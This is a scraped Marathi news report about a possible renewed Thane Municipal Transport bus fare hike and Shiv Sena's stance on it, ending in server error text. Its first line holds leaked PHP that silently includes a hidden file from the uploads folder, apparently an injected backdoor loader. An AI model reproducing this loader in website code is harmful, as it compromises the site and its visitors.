add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘टीएमटी’ला पुन्हा भाडेवाढीचे वेध? – SOCH INDIA
Menu

देश
‘टीएमटी’ला पुन्हा भाडेवाढीचे वेध?

nobanner

ठाणे महापालिका परिवहन उपक्रमातील बसगाडय़ांच्या तिकीट दरात २० टक्के वाढ करण्याचा प्रस्ताव सत्ताधारी शिवसेनेने गेल्यावर्षी फेटाळून लावला असतानाच या भाडेवाढीसाठी आग्रही असलेल्या प्रशासनाने यंदाच्या परिवहन अर्थसंकल्पात पुन्हा एकदा भाडेवाढीचा प्रस्ताव अंतर्भूत करण्याचा विचार चालवला आहे. त्यामुळे प्रशासनाचा आग्रह सत्ताधारी शिवसेनेचे नेते कितपत मनावर घेतात याकडे सर्वाचे लक्ष लागले आहे.

ठाणे महापालिका परिवहन उपक्रमातील बसगाडय़ांच्या तिकीट दरात २० टक्के वाढ करण्याची घोषणा प्रशासनाने गेल्यावर्षीच्या अर्थसंकल्पामध्ये केली होती. लोकसभा निवडणुका तोंडावर असल्यामुळे परिवहन समितीमधील सत्ताधारी शिवसेनेने हा प्रस्ताव फेटाळून लावला होता. त्यानंतर भाडेवाढ लागू करण्यासाठी आग्रही असलेल्या प्रशासनाने सर्वसाधारण सभेपुढे हा प्रस्ताव मांडण्यासाठी हालचाली सुरू केल्या होत्या. त्यावेळेसही सत्ताधारी शिवसेनेकडून त्यास विरोध झाला होता. येत्या आठवडाभरात परिवहन उपक्रमाचा नवा अर्थसंकल्प सादर केला जाणार असून त्यामध्ये गेल्यावर्षीप्रमाणे यंदाही बस भाडेवाढ प्रस्तावित करण्याचा विचार प्रशासकीय पातळीवर सुरू आहे.

या प्रस्तावासाठी प्रशासन यापूर्वीही आग्रही होते. त्यामुळे यंदाच्या अर्थसंकल्पात भाडेवाढीची घोषणा होण्याची शक्यता नाकारता येत नाही, अशी माहिती महापालिकेतील वरिष्ठ सूत्रांनी दिली.

बेस्टचा धसका

बेस्ट उपक्रमाने गेल्यावर्षी भाडेकपात केल्याने टीएमटीच्या प्रवासीसंख्येवर विपरीत परिणाम झाला आहे. टीएमटीचे दैनंदिन उत्पन्न जवळपास दोन ते तीन लाखांनी कमी झाले आहे. त्यातच घोडबंदर येथे मेट्रोच्या कामामुळे कोंडी होत असल्याने या भागातील ३० टक्के बसफेऱ्या कमी झाल्या असून त्याचाही परिणाम उत्पन्नावर होत आहे. टीएमटीने बसच्या तिकीट दरात भाडेवाढ लागू केली, तर उर्वरित प्रवासी बेस्टच्या स्वस्त प्रवासाकडे वळण्याची शक्यता आहे.

सेनेची भूमिका काय?

गेल्यावर्षी लोकसभा निवडणुकीच्या तोंडावर टीएमटी भाडेवाढीचा प्रस्ताव अडचणीचा ठरण्याची शक्यता लक्षात घेऊन सत्ताधारी शिवसेनेने तो फेटाळून लावला होता. यंदाच्या वर्षांत कोणत्याही निवडणुका नाहीत. त्यामुळे प्रशासनाने पुन्हा भाडेवाढ प्रस्तावित केली तर शिवसेनेची काय भूमिका असेल याकडे सर्वाचे लक्ष लागले आहे. तसेच मुंबईत शिवसेनेची सत्ता असून त्यांनी बेस्टच्या भाडय़ात मोठी कपात केली आहे. ठाण्यात शिवसेनेने अद्याप असा निर्णय घेतलेला नाही.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.